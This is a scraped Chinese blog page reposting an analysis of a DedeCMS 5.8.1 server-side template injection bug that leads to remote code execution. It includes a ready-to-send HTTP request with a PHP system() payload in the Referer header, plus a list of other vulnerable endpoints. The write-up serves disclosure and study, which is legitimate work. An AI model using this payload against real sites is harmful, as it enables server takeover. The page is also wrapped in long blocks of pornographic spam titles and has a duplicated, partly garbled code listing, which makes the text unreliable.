日韩av黄I国产麻豆传媒I国产91av视频在线观看I日韩一区二区三区在线看I美女国产在线I麻豆视频国产在线观看I成人黄色短片

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

【安全漏洞】DedeCMS-5.8.1 SSTI模板注入导致RCE

發布時間:2025/3/21 编程问答 41 豆豆
生活随笔 收集整理的這篇文章主要介紹了 【安全漏洞】DedeCMS-5.8.1 SSTI模板注入导致RCE 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

漏洞類型

SSTI RCE

利用條件

影響范圍應用

漏洞概述

2021年9月30日,國外安全研究人員Steven Seeley披露了最新的DedeCMS版本中存在的一處SQL注入漏洞以及一處SSTI導致的RCE漏洞,由于SQL注入漏洞利用條件極為苛刻,故這里只對該SSTI注入漏洞進行簡要分析復現

漏環境搭建

【技術學習資料】

漏洞復現

這里使用phpstudy來搭建環境




網站前臺:http://192.168.59.1/index.php?upcache=1

網站后臺: http://192.168.59.1/dede/login.php?gotopa…

漏洞利用

GET /plus/flink.php?dopost=save HTTP/1.1 Host: 192.168.59.1 Referer: <?php "system"(whoami);die;/* Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: PHPSESSID=rh4vs9n0m1ihpuguuok4oinerr; _csrf_name_26859a31=736abb4d994bae3b85bba1781e8a50f9; _csrf_name_26859a31__ckMd5=0f32d9d2b18e1390 Connection: close


類似的URL還有:

/plus/flink.php?dopost=save /plus/users_products.php?oid=1337 /plus/download.php?aid=1337 /plus/showphoto.php?aid=1337 /plus/users-do.php?fmdo=sendMail /plus/posttocar.php?id=1337 /plus/recommend.php

漏洞分析

漏洞入口位于plus/flink.php文件中,在該文件中如果我們傳入的dopost值為save且未傳遞驗證碼時,緊接著會去調用ShowMsg函數:

之后跟蹤進入到include/common.func.php文件中的ShowMsg()函數內

/*** 短消息函數,可以在某個動作處理后友好的提示信息** @param string $msg 消息提示信息* @param string $gourl 跳轉地址* @param int $onlymsg 僅顯示信息* @param int $limittime 限制時間* @return void*/ function ShowMsg($msg, $gourl, $onlymsg = 0, $limittime = 0) {if (empty($GLOBALS['cfg_plus_dir'])) {$GLOBALS['cfg_plus_dir'] = '..';}if ($gourl == -1) {$gourl = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : '';if ($gourl == "") {$gourl = -1;}}$htmlhead = "<html>\r\n<head>\r\n<title>DedeCMS提示信息</title>\r\n<meta http-equiv=\"Content-Type\" content=\"text/html; charset={dede:global.cfg_soft_lang/}\" /><meta name=\"viewport\" content=\"width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no\"><meta name=\"renderer\" content=\"webkit\"><meta http-equiv=\"Cache-Control\" content=\"no-siteapp\" /><link rel=\"stylesheet\" type=\"text/css\" href=\"{dede:global.cfg_assets_dir/}/pkg/uikit/css/uikit.min.css\" /><link rel=\"stylesheet\" type=\"text/css\" href=\"{dede:global.cfg_assets_dir/}/css/manage.dede.css\"><base target='_self'/></head><body>" . (isset($GLOBALS['ucsynlogin']) ? $GLOBALS['ucsynlogin'] : '') . "<center style=\"width:450px\" class=\"uk-container\"><div class=\"uk-card uk-card-small uk-card-default\" style=\"margin-top: 50px;\"><div class=\"uk-card-header\" style=\"height:20px\">DedeCMS 提示信息!</div><script>\r\n";$htmlfoot = "</script></center><script src=\"{dede:global.cfg_assets_dir/}/pkg/uikit/js/uikit.min.js\"></script><script src=\"{dede:global.cfg_assets_dir/}/pkg/uikit/js/uikit-icons.min.js\"></script></body>\r\n</html>\r\n";$litime = ($limittime == 0 ? 1000 : $limittime);$func = '';if ($gourl == '-1') {if ($limittime == 0) {$litime = 3000;}$gourl = "javascript:history.go(-1);";}if ($gourl == '' || $onlymsg == 1) {$msg = "<script>alert(\"" . str_replace("\"", "“", $msg) . "\");</script>";} else {//當網址為:close::objname 時, 關閉父框架的id=objname元素if (preg_match('/close::/', $gourl)) {$tgobj = trim(preg_replace('/close::/', '', $gourl));$gourl = 'javascript:;';$func .= "window.parent.document.getElementById('{$tgobj}').style.display='none';\r\n";}$func .= "var pgo=0;function JumpUrl(){if(pgo==0){ location='$gourl'; pgo=1; }}\r\n";$rmsg = $func;$rmsg .= "document.write(\"<div style='height:130px;font-size:10pt;background:#ffffff'><br />\");\r\n";$rmsg .= "document.write(\"" . str_replace("\"", "“", $msg) . "\");\r\n";$rmsg .= "document.write(\"";if ($onlymsg == 0) {if ($gourl != 'javascript:;' && $gourl != '') {$rmsg .= "<br /><a href='{$gourl}'>如果你的瀏覽器沒反應,請點擊這里...</a>";$rmsg .= "<br/></div>\");\r\n";$rmsg .= "setTimeout('JumpUrl()',$litime);";} else {$rmsg .= "<br/></div>\");\r\n";}} else {$rmsg .= "<br/><br/></div>\");\r\n";}$msg = $htmlhead . $rmsg . $htmlfoot;}$tpl = new DedeTemplate();$tpl->LoadString($msg);$tpl->Display(); }

在這里我們可以看到如果gourl被設置為?1(間接可控),則攻擊者可以通過HTTPREFERER控制gourl處變量的值,而該變量未經過濾直接賦值給變量gourl,之后經過一系列的操作之后將gourl與html代碼拼接處理后轉而調用tpl?>LoadString進行頁面渲染操作,之后跟進LoadString可以看到此處的sourceString變量直接由str賦值過來,該變量攻擊者可控,之后將其進行一次md5計算,然后設置緩存文件和緩存配置文件名,緩存文件位于data\tplcache目錄,之后調用ParserTemplate對文件進行解析:

ParserTemplate如下:

/*** 解析模板** @access public* @return void*/public function ParseTemplate(){if ($this->makeLoop > 5) {return;}$this->count = -1;$this->cTags = array();$this->isParse = true;$sPos = 0;$ePos = 0;$tagStartWord = $this->tagStartWord;$fullTagEndWord = $this->fullTagEndWord;$sTagEndWord = $this->sTagEndWord;$tagEndWord = $this->tagEndWord;$startWordLen = strlen($tagStartWord);$sourceLen = strlen($this->sourceString);if ($sourceLen <= ($startWordLen + 3)) {return;}$cAtt = new TagAttributeParse();$cAtt->CharToLow = true;//遍歷模板字符串,請取標記及其屬性信息$t = 0;$preTag = '';$tswLen = strlen($tagStartWord);@$cAtt->cAttributes->items = array();for ($i = 0; $i < $sourceLen; $i++) {$ttagName = '';//如果不進行此判斷,將無法識別相連的兩個標記if ($i - 1 >= 0) {$ss = $i - 1;} else {$ss = 0;}$tagPos = strpos($this->sourceString, $tagStartWord, $ss);//判斷后面是否還有模板標記if ($tagPos == 0 && ($sourceLen - $i < $tswLen|| substr($this->sourceString, $i, $tswLen) != $tagStartWord)) {$tagPos = -1;break;}//獲取TAG基本信息for ($j = $tagPos + $startWordLen; $j < $tagPos + $startWordLen + $this->tagMaxLen; $j++) {if (preg_match("/[ >\/\r\n\t\}\.]/", $this->sourceString[$j])) {break;} else {$ttagName .= $this->sourceString[$j];}}if ($ttagName != '') {$i = $tagPos + $startWordLen;$endPos = -1;//判斷 '/}' '{tag:下一標記開始' '{/tag:標記結束' 誰最靠近$fullTagEndWordThis = $fullTagEndWord . $ttagName . $tagEndWord;$e1 = strpos($this->sourceString, $sTagEndWord, $i);$e2 = strpos($this->sourceString, $tagStartWord, $i);$e3 = strpos($this->sourceString, $fullTagEndWordThis, $i);$e1 = trim($e1);$e2 = trim($e2);$e3 = trim($e3);$e1 = ($e1 == '' ? '-1' : $e1);$e2 = ($e2 == '' ? '-1' : $e2);$e3 = ($e3 == '' ? '-1' : $e3);if ($e3 == -1) {//不存在'{/tag:標記'$endPos = $e1;$elen = $endPos + strlen($sTagEndWord);} else if ($e1 == -1) {//不存在 '/}'$endPos = $e3;$elen = $endPos + strlen($fullTagEndWordThis);}//同時存在 '/}' 和 '{/tag:標記'else {//如果 '/}' 比 '{tag:'、'{/tag:標記' 都要靠近,則認為結束標志是 '/}',否則結束標志為 '{/tag:標記'if ($e1 < $e2 && $e1 < $e3) {$endPos = $e1;$elen = $endPos + strlen($sTagEndWord);} else {$endPos = $e3;$elen = $endPos + strlen($fullTagEndWordThis);}}//如果找不到結束標記,則認為這個標記存在錯誤if ($endPos == -1) {echo "Tpl Character postion $tagPos, '$ttagName' Error!<br />\r\n";break;}$i = $elen;//分析所找到的標記位置等信息$attStr = '';$innerText = '';$startInner = 0;for ($j = $tagPos + $startWordLen; $j < $endPos; $j++) {if ($startInner == 0) {if ($this->sourceString[$j] == $tagEndWord) {$startInner = 1;continue;} else {$attStr .= $this->sourceString[$j];}} else {$innerText .= $this->sourceString[$j];}}$ttagName = strtolower($ttagName);//if、php標記,把整個屬性串視為屬性if (preg_match("/^if[0-9]{0,}$/", $ttagName)) {$cAtt->cAttributes = new TagAttribute();$cAtt->cAttributes->count = 2;$cAtt->cAttributes->items['tagname'] = $ttagName;$cAtt->cAttributes->items['condition'] = preg_replace("/^if[0-9]{0,}[\r\n\t ]/", "", $attStr);$innerText = preg_replace("/\{else\}/i", '<' . "?php\r\n}\r\nelse{\r\n" . '?' . '>', $innerText);} else if ($ttagName == 'php') {$cAtt->cAttributes = new TagAttribute();$cAtt->cAttributes->count = 2;$cAtt->cAttributes->items['tagname'] = $ttagName;$cAtt->cAttributes->items['code'] = '<' . "?php\r\n" . trim(preg_replace("/^php[0-9]{0,}[\r\n\t ]/","", $attStr)) . "\r\n?" . '>';} else {//普通標記,解釋屬性$cAtt->SetSource($attStr);}$this->count++;$cTag = new Tag();$cTag->tagName = $ttagName;$cTag->startPos = $tagPos;$cTag->endPos = $i;$cTag->cAtt = $cAtt->cAttributes;$cTag->isCompiler = false;$cTag->tagID = $this->count;$cTag->innerText = $innerText;$this->cTags[$this->count] = $cTag;} else {$i = $tagPos + $startWordLen;break;}} //結束遍歷模板字符串if ($this->count > -1 && $this->isCompiler) {$this->CompilerAll();}}

之后返回上一級,在這里會緊接著調用Display函數對解析結果進行展示,在這里會調用WriteCache函數
ParserTemplate如下:

/**
* 解析模板
*
* @access public
* @return void
*/
public function ParseTemplate()
{
if ($this->makeLoop > 5) {
return;
}
$this->count = -1;
$this->cTags = array();
$this->isParse = true;
$sPos = 0;
$ePos = 0;
$tagStartWord = $this->tagStartWord;
$fullTagEndWord = $this->fullTagEndWord;
$sTagEndWord = $this->sTagEndWord;
$tagEndWord = $this->tagEndWord;
startWordLen=strlen(startWordLen = strlen(startWordLen=strlen(tagStartWord);
sourceLen=strlen(sourceLen = strlen(sourceLen=strlen(this->sourceString);
if (sourceLen<=(sourceLen <= (sourceLen<=(startWordLen + 3)) {
return;
}
$cAtt = new TagAttributeParse();
$cAtt->CharToLow = true;

//遍歷模板字符串,請取標記及其屬性信息$t = 0;$preTag = '';$tswLen = strlen($tagStartWord);@$cAtt->cAttributes->items = array();for ($i = 0; $i < $sourceLen; $i++) {$ttagName = '';//如果不進行此判斷,將無法識別相連的兩個標記if ($i - 1 >= 0) {$ss = $i - 1;} else {$ss = 0;}$tagPos = strpos($this->sourceString, $tagStartWord, $ss);//判斷后面是否還有模板標記if ($tagPos == 0 && ($sourceLen - $i < $tswLen|| substr($this->sourceString, $i, $tswLen) != $tagStartWord)) {$tagPos = -1;break;}//獲取TAG基本信息for ($j = $tagPos + $startWordLen; $j < $tagPos + $startWordLen + $this->tagMaxLen; $j++) {if (preg_match("/[ >\/\r\n\t\}\.]/", $this->sourceString[$j])) {break;} else {$ttagName .= $this->sourceString[$j];}}if ($ttagName != '') {$i = $tagPos + $startWordLen;$endPos = -1;//判斷 '/}' '{tag:下一標記開始' '{/tag:標記結束' 誰最靠近$fullTagEndWordThis = $fullTagEndWord . $ttagName . $tagEndWord;$e1 = strpos($this->sourceString, $sTagEndWord, $i);$e2 = strpos($this->sourceString, $tagStartWord, $i);$e3 = strpos($this->sourceString, $fullTagEndWordThis, $i);$e1 = trim($e1);$e2 = trim($e2);$e3 = trim($e3);$e1 = ($e1 == '' ? '-1' : $e1);$e2 = ($e2 == '' ? '-1' : $e2);$e3 = ($e3 == '' ? '-1' : $e3);if ($e3 == -1) {//不存在'{/tag:標記'$endPos = $e1;$elen = $endPos + strlen($sTagEndWord);} else if ($e1 == -1) {//不存在 '/}'$endPos = $e3;$elen = $endPos + strlen($fullTagEndWordThis);}//同時存在 '/}' 和 '{/tag:標記'else {//如果 '/}' 比 '{tag:'、'{/tag:標記' 都要靠近,則認為結束標志是 '/}',否則結束標志為 '{/tag:標記'if ($e1 < $e2 && $e1 < $e3) {$endPos = $e1;$elen = $endPos + strlen($sTagEndWord);} else {$endPos = $e3;$elen = $endPos + strlen($fullTagEndWordThis);}}//如果找不到結束標記,則認為這個標記存在錯誤if ($endPos == -1) {echo "Tpl Character postion $tagPos, '$ttagName' Error!<br />\r\n";break;}$i = $elen;//分析所找到的標記位置等信息$attStr = '';$innerText = '';$startInner = 0;for ($j = $tagPos + $startWordLen; $j < $endPos; $j++) {if ($startInner == 0) {if ($this->sourceString[$j] == $tagEndWord) {$startInner = 1;continue;} else {$attStr .= $this->sourceString[$j];}} else {$innerText .= $this->sourceString[$j];}}$ttagName = strtolower($ttagName);//if、php標記,把整個屬性串視為屬性if (preg_match("/^if[0-9]{0,}$/", $ttagName)) {$cAtt->cAttributes = new TagAttribute();$cAtt->cAttributes->count = 2;$cAtt->cAttributes->items['tagname'] = $ttagName;$cAtt->cAttributes->items['condition'] = preg_replace("/^if[0-9]{0,}[\r\n\t ]/", "", $attStr);$innerText = preg_replace("/\{else\}/i", '<' . "?php\r\n}\r\nelse{\r\n" . '?' . '>', $innerText);} else if ($ttagName == 'php') {$cAtt->cAttributes = new TagAttribute();$cAtt->cAttributes->count = 2;$cAtt->cAttributes->items['tagname'] = $ttagName;$cAtt->cAttributes->items['code'] = '<' . "?php\r\n" . trim(preg_replace("/^php[0-9]{0,}[\r\n\t ]/","", $attStr)) . "\r\n?" . '>';} else {//普通標記,解釋屬性$cAtt->SetSource($attStr);}$this->count++;$cTag = new Tag();$cTag->tagName = $ttagName;$cTag->startPos = $tagPos;$cTag->endPos = $i;$cTag->cAtt = $cAtt->cAttributes;$cTag->isCompiler = false;$cTag->tagID = $this->count;$cTag->innerText = $innerText;$this->cTags[$this->count] = $cTag;} else {$i = $tagPos + $startWordLen;break;}} //結束遍歷模板字符串if ($this->count > -1 && $this->isCompiler) {$this->CompilerAll();} }

之后返回上一級,在這里會緊接著調用Display函數對解析結果進行展示,在這里會調用WriteCache函數

在WriteCache函數中寫入緩存文件:


在這里使用GetResult返回值sourceString來設置$result變量,該變量包含攻擊者控制的輸入數據:


之后調用CheckDisabledFunctions函數進行檢查操作,該函數主要用于檢查是否存在被禁止的函數,然后通過token_get_all_nl函數獲取輸入,然而處理時并沒有過濾雙引號,存在被繞過的風險,攻擊者可以通過將惡意PHP寫到臨時文件,之后在Display函數處通過include $tpl->CacheFile()將惡意臨時文件包含進來從而實現遠程代碼執行:

安全建議

目前官方已發布最新版本:DedeCMS V5.7.80 UTF-8正式版,建議升級到該版本

點擊獲取【網絡安全學習資料·攻略】

總結

以上是生活随笔為你收集整理的【安全漏洞】DedeCMS-5.8.1 SSTI模板注入导致RCE的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。

成人av免费在线观看 | 久久精品一区二 | 日躁夜躁狠狠躁2001 | 欧美精品资源 | a级国产乱理论片在线观看 伊人宗合网 | 久久99亚洲热视 | 精品免费在线视频 | 午夜视频不卡 | 一区在线播放 | 四虎在线免费观看 | 日韩视频免费观看高清 | 一级大片在线观看 | 婷婷丁香七月 | 在线观看国产日韩 | 亚洲亚洲精品在线观看 | 色网站免费在线观看 | 国产精品mm| 狠狠躁夜夜a产精品视频 | 国产精品美女免费看 | 日本女人的性生活视频 | 国产不卡免费av | 日日干av| 欧美国产亚洲精品久久久8v | 91视频麻豆视频 | 欧美日本不卡视频 | 久久视频在线免费观看 | 国产亚洲人成网站在线观看 | 亚洲精品白浆高清久久久久久 | 中文字幕乱在线伦视频中文字幕乱码在线 | 日日干影院 | 亚洲精品午夜久久久久久久久久久 | 亚洲精品99 | 亚洲天天干 | 婷婷六月在线 | 国产精品一区二区62 | 91在线网站| 免费黄色av | 国产成人福利在线观看 | 91精品视屏| 亚洲久草在线视频 | 国产第一页在线观看 | 夜夜高潮夜夜爽国产伦精品 | 在线免费观看av网站 | 91 在线视频播放 | 一本一本久久a久久精品综合小说 | 色婷婷av一区 | 天天射天天干天天操 | 色就是色综合 | 精品国产欧美一区二区 | 国产97视频在线 | 国产在线观 | 欧美激情精品久久久久久免费印度 | 亚洲国产精品女人久久久 | 手机在线看a | 日日成人网 | 中文一区二区三区在线观看 | 成片免费观看视频 | 欧美久久精品 | 500部大龄熟乱视频使用方法 | 午夜精品久久久久久久久久 | 色天天久久 | av在线免费观看网站 | 韩国视频一区二区三区 | 日韩免费视频 | 玖玖爱国产在线 | 97精品欧美91久久久久久 | 五月香视频在线观看 | 99久久日韩精品视频免费在线观看 | 人人射人人 | 探花视频在线观看免费 | 四虎影视精品 | 国产精品毛片一区二区 | 午夜精品久久久久久久久久久久 | 色婷婷综合久久久 | 天天插天天干天天操 | 手机av在线网站 | 日日操日日插 | 亚洲一级片 | 2023天天干 | 国产精品 视频 | 五月丁香 | 美女网站在线免费观看 | 亚洲国产97在线精品一区 | 国产精品涩涩屋www在线观看 | 久久久久亚洲天堂 | 日韩精品一区二区三区丰满 | 国产免费又黄又爽 | 在线视频 91 | 99久久精品电影 | 国产福利在线免费 | 国产免费中文字幕 | 999在线视频 | 精品成人在线 | 中文字幕4 | 99热在线观看免费 | av电影一区 | 中文字幕亚洲欧美日韩 | 中文字幕在线影视资源 | 成人久久久久 | 国产精品一区二区三区视频免费 | 日本性高潮视频 | 免费视频xnxx com | 国产成人精品一二三区 | 在线日本看片免费人成视久网 | 日韩av伦理片 | 久久久免费精品国产一区二区 | 天堂av在线网站 | www夜夜操 | 91麻豆看国产在线紧急地址 | 久草在线综合 | 中文字幕在线视频一区 | 亚洲黄色一级大片 | 香蕉精品视频在线观看 | 久久久受www免费人成 | 免费看片日韩 | av在线一二三区 | 日日干,天天干 | 精品视频网站 | 国产.精品.日韩.另类.中文.在线.播放 | 精品久久久久久综合日本 | 国产精品黑丝在线观看 | 一区二区激情视频 | 中文字幕综合在线 | 久99久视频 | 国产精品视频 | 欧美成人久久 | 97视频一区 | 国产传媒中文字幕 | 国产一级二级在线 | 午夜精品久久久久久久爽 | 狠狠五月婷婷 | 99在线精品视频在线观看 | 天天操人人要 | 久久成人资源 | 久久免费99精品久久久久久 | 日韩电影中文,亚洲精品乱码 | 国产婷婷视频在线 | 五月天天色 | 91大神精品视频在线观看 | 999电影免费在线观看2020 | 久久久久久久亚洲精品 | 91爱爱视频| 三级免费黄| 操操操影院 | 国产精品都在这里 | 婷婷激情在线 | 91av99| 91亚洲综合 | 欧美性视频网站 | 黄色国产在线观看 | 成人欧美一区二区三区黑人麻豆 | 五月婷婷激情综合 | 日日夜夜婷婷 | 亚洲第一香蕉视频 | 久久免费精品一区二区三区 | aa级黄色大片 | 午夜三级在线 | 精品国产一区二区三区四 | 狠狠狠干狠狠 | 最新成人在线 | 欧美激情精品久久久久久免费印度 | 国产视频首页 | 不卡av在线免费观看 | 久久久久免费精品国产 | av免费黄色| 日韩高清dvd | 丁香婷婷久久久综合精品国产 | 亚洲乱码在线观看 | 美女网站免费福利视频 | 在线国产一区二区三区 | 成人欧美日韩国产 | 国产精品久久久免费看 | 欧美一区二区在线免费看 | 天堂av色婷婷一区二区三区 | 在线观看视频国产一区 | 麻豆成人网 | 久久国产精品偷 | 伊人va | 亚洲欧美日韩国产精品一区午夜 | 99视频精品全国免费 | 麻豆91小视频 | 婷婷免费视频 | 2022国产精品视频 | av黄色免费网站 | 麻豆国产精品一区二区三区 | 久草视频播放 | 92国产精品久久久久首页 | 911精品美国片911久久久 | 二区视频在线观看 | 97视频免费在线观看 | 国产精品不卡在线观看 | 91麻豆国产 | 97精品在线| 亚洲免费av电影 | 69欧美视频| 国产青春久久久国产毛片 | 在线a视频 | 中文字幕在线电影 | 欧美激情综合五月色丁香小说 | 中文字幕av网站 | 国产丝袜美腿在线 | 超碰在线观看av | 国产麻豆精品免费视频 | 国产美腿白丝袜足在线av | 91理论片午午伦夜理片久久 | 国产成人精品av在线 | 国产免费高清 | 国产一级在线观看 | 亚色视频在线观看 | 2024国产精品视频 | 国产精品午夜在线 | 欧美日产一区 | 91夫妻自拍 | 欧美黑人巨大xxxxx | www.色国产 | 日韩一级电影在线观看 | 综合色综合 | 99免费看片 | 国精产品999国精产品视频 | 99理论片 | 久久久国产一区二区 | 综合激情网 | 日韩精品免费 | 亚洲综合色站 | 成人蜜桃网 | 国产精品情侣视频 | 国产福利午夜 | 久久综合九色综合久99 | 久久精品日产第一区二区三区乱码 | 五月婷婷在线综合 | 蜜桃视频在线观看一区 | 欧美激情第十页 | 中文在线a天堂 | 黄色大片免费网站 | 欧美久久久久久久久久久久久 | 亚洲激情视频 | av亚洲产国偷v产偷v自拍小说 | 国产精品色视频 | 色91av| 免费av免费观看 | 精品人妖videos欧美人妖 | 91尤物国产尤物福利在线播放 | 国产视频 亚洲精品 | 五月婷综合 | 欧美在线观看视频一区二区三区 | 久久国产精品免费一区二区三区 | 久草在线视频国产 | 探花视频在线观看免费版 | 91精品国产99久久久久久久 | 国产伦精品一区二区三区无广告 | 免费成人av | 91久久国产露脸精品国产闺蜜 | 久草在| 草草草影院 | 中文字幕视频 | 亚洲人成在线观看 | 久久久99精品免费观看app | 国产精品丝袜久久久久久久不卡 | 中文字幕在线播放一区 | 最新成人在线 | 国产黄色av影视 | 亚洲春色奇米影视 | 亚洲精品国产精品乱码在线观看 | 久久久久久久久久久成人 | 欧美激情精品久久久久 | 亚洲综合色婷婷 | 91av视频在线免费观看 | 日韩成人一级大片 | 免费在线 | 日日日天天天 | 高清av中文在线字幕观看1 | 国产一级久久 | 亚洲综合视频在线 | 久久免费视频8 | 国产精品成人一区 | 伊人电影在线观看 | 久久精品99国产国产精 | 久久精品99国产国产 | 成人av片免费看 | 久久免费国产精品1 | 男女男视频 | 亚洲小视频在线观看 | 丰满少妇麻豆av | 亚洲综合少妇 | 国产中文自拍 | 精品一区二区在线观看 | 精品一区二区三区香蕉蜜桃 | 九九有精品 | 美女久久一区 | 亚洲精品久久久久www | 亚洲一区视频在线播放 | 国产伦理剧 | 亚洲免费视频在线观看 | 操操操干干干 | 国产精品激情偷乱一区二区∴ | 久久精品老司机 | 亚洲黄色一级大片 | 91麻豆精品国产91久久久久 | 成人精品久久久 | 黄色一二级片 | 婷婷五天天在线视频 | 综合天天色 | 国产精品av一区二区 | 中文字幕亚洲情99在线 | 精品亚洲va在线va天堂资源站 | 精品国产一区二区三区日日嗨 | 天天色天天色天天色 | 免费视频黄 | 91精品国| 国产区在线| 一区三区视频在线观看 | 精品成人在线 | 西西444www大胆高清视频 | 少妇bbb搡bbbb搡bbbb′ | 久久久国际精品 | 久久在线观看 | 日韩乱码在线 | 中文字幕免费成人 | 日韩欧美国产激情在线播放 | 日本中出在线观看 | 亚洲精品视频在线观看视频 | 美女免费视频黄 | 亚洲成av人影院 | 日韩免费一区 | 丁香激情婷婷 | 99在线精品视频在线观看 | 国产成人精品午夜在线播放 | 啪啪小视频网站 | 欧美乱熟臀69xxxxxx | 欧美成天堂网地址 | 国产精品久久久视频 | 国产成人精品999 | 中文字幕4 | 欧美一级久久久久 | 中文字幕久久亚洲 | 美女av电影 | 99热手机在线观看 | 精品久久久久久一区二区里番 | 亚洲色图激情文学 | 欧美日韩国产精品一区二区三区 | 婷婷四房综合激情五月 | 亚洲欧美激情精品一区二区 | 久久99久久99精品免观看软件 | 91麻豆精品国产自产在线游戏 | 高清不卡一区二区三区 | 夜夜夜精品 | 天天摸天天操天天舔 | 狠狠干电影 | 国产情侣一区 | 国产精品乱码久久久久 | 波多野结衣电影一区二区三区 | 狠狠综合| 亚洲最新视频在线播放 | 国内精品视频在线 | 欧美久久久久久久久久久 | 免费久草视频 | 少妇av网 | 日韩欧美亚洲 | 一区二区久久久久 | 97视频免费观看2区 亚洲视屏 | 久久久久国产精品视频 | 国产原创91 | 涩涩网站在线播放 | 久久午夜精品 | 999久久a精品合区久久久 | 免费观看日韩av | 在线视频精品播放 | 亚洲精品久久久久中文字幕二区 | 九色精品免费永久在线 | 欧美精品国产综合久久 | 日本精品视频一区二区 | 国产中文自拍 | 日韩欧美精品在线观看 | 日批在线看 | 亚洲欧美日韩精品一区二区 | 美国av片在线观看 | 99精品久久精品一区二区 | 999一区二区三区 | 天天天天射| 在线观看你懂的网址 | 中文字幕首页 | 午夜一级免费电影 | 久久夜夜爽 | 成人av资源网 | 欧美午夜a | 国产一级在线看 | 久久久毛片 | 日韩精品视频网站 | 久久这里只有精品视频首页 | 久草青青在线观看 | 国产精品va最新国产精品视频 | 国产精品久久久久久久久免费 | 97精品国产91久久久久久 | 亚洲国产欧洲综合997久久, | 视频在线观看入口黄最新永久免费国产 | 亚洲 欧美日韩 国产 中文 | 成人精品影视 | 久久精品一二三区白丝高潮 | 国产精品一区二区在线观看免费 | 在线成人免费av | 99国产精品一区二区 | 亚洲黄在线观看 | 91tv国产成人福利 | 麻花豆传媒一二三产区 | 日韩在线欧美在线 | 青青色影院 | 免费碰碰 | 国内丰满少妇猛烈精品播 | 九九99| 国产xxxxx在线观看 | 国产v在线观看 | 碰超在线97人人 | av电影中文字幕在线观看 | 日韩视频二区 | 一区二区三区手机在线观看 | 高清av在线| 丁香六月久久综合狠狠色 | 亚洲激情电影在线 | 不卡的av片| 中文字幕在线观看完整版电影 | 欧美激情第八页 | 在线国产精品一区 | 欧美日韩一区二区视频在线观看 | 美女网站在线观看 | 亚洲精品小区久久久久久 | 国产91在线免费视频 | 国产精品久久婷婷六月丁香 | 欧美久久久久久久久久久久久 | 久久精品99精品国产香蕉 | 伊人伊成久久人综合网站 | 亚洲一片黄 | 麻豆国产精品永久免费视频 | 国产99精品| 91大神免费视频 | 久久精品99精品国产香蕉 | 精品爱爱 | 国产一级在线 | 国产精品成人免费精品自在线观看 | 国产91探花 | 午夜少妇一区二区三区 | 一区二区视频在线播放 | 亚洲天堂网在线观看视频 | 99视频精品 | 成人亚洲欧美 | 久久男女视频 | 亚洲免费观看视频 | 久久久九色精品国产一区二区三区 | 韩国av免费在线观看 | 中文字幕在线观看国产 | 丝袜网站在线观看 | 久久精品一区 | 久久成人高清 | 黄色大全在线观看 | 少妇bbw搡bbbb搡bbb | 麻豆精品传媒视频 | 黄色三级免费观看 | 久草热久草视频 | 91色网址 | 国产五月色婷婷六月丁香视频 | 99久久精品免费看国产四区 | 天堂在线成人 | 精品视频久久 | 成人免费亚洲 | 最近中文字幕国语免费av | 在线视频a | 5月丁香婷婷综合 | 久久66热这里只有精品 | 丁香婷婷久久 | 日本中文一级片 | 色av资源网 | 狠狠躁18三区二区一区ai明星 | 美女av免费看 | 四虎影视精品 | 亚洲国产丝袜在线观看 | 国产高清视频在线免费观看 | 米奇四色影视 | 免费看成人 | 91成人免费视频 | 久久99国产精品自在自在app | www.色婷婷.com | 人人爽人人爽 | 亚洲电影院 | 免费观看91视频 | 日韩精品视频免费在线观看 | 国产成人精品午夜在线播放 | 人人草在线观看 | 一区在线播放 | 久久成人亚洲欧美电影 | 成人午夜黄色影院 | 久久婷婷国产色一区二区三区 | 国产美女精品久久久 | 521色香蕉网站在线观看 | 日韩欧美国产精品 | 国产成人亚洲精品自产在线 | 国产成人黄色网址 | 午夜影视剧场 | 精品国产电影一区 | 国产日韩精品在线 | 日韩在线观看一区二区 | 香蕉手机在线 | 一区二区高清在线 | 精品亚洲成a人在线观看 | 天天摸夜夜操 | 日韩中文字幕在线观看 | 欧美少妇bbwhd | 国产精品久久久一区二区 | 国产韩国日本高清视频 | 国产一级不卡毛片 | 亚洲午夜精品久久久久久久久久久久 | bayu135国产精品视频 | 久久在线免费 | 欧美一级日韩三级 | 激情动态 | www.狠狠操| 天天综合网 天天 | 国产精品扒开做爽爽的视频 | 97影视| 久久久久亚洲精品男人的天堂 | 国内精品久久久久久中文字幕 | 欧美黄在线 | 狠狠操在线 | 99久久er热在这里只有精品66 | 中文综合在线 | 亚洲精品久久久久久中文传媒 | 夜夜爽夜夜操 | 久久国产精品精品国产色婷婷 | 免费看污黄网站 | 成人a免费视频 | 91麻豆精品国产自产在线 | 久久调教视频 | 中文乱幕日产无线码1区 | 国产精品一区二区三区免费视频 | 国产老妇av | 91传媒在线播放 | 人人添人人澡人人澡人人人爽 | 最近日本韩国中文字幕 | av 一区二区三区 | 久操视频在线观看 | 69国产成人综合久久精品欧美 | 亚洲免费国产视频 | 91视频在线免费观看 | 国产美女久久 | 久久精品国产免费看久久精品 | 国产一区私人高清影院 | av噜噜噜在线播放 | 国产伦理一区二区三区 | 色伊人网| 超碰在线天天 | 国产资源在线免费观看 | 69精品视频 | 中文理论片 | 久久国产三级 | 久久久久久久久久久久影院 | 日韩精品你懂的 | 91porny九色91啦中文 | 国产淫片免费看 | 国产精品久久久久久久久久免费 | 免费a视频在线观看 | www.av中文字幕.com | 九九热久久免费视频 | 小草av在线播放 | 激情网色 | 99久久久久免费精品国产 | 五月婷婷在线视频观看 | 91网免费观看 | 日韩高清不卡一区二区三区 | 97在线观看免费高清完整版在线观看 | 免费激情在线电影 | 9999在线 | www.五月天色 | 91香蕉视频720p | 国产精品视频全国免费观看 | www.色综合.com | 欧美精品在线视频观看 | 综合久色| 麻豆精品视频在线观看免费 | 人人草天天草 | 国产一区二区在线观看视频 | 69av国产 | 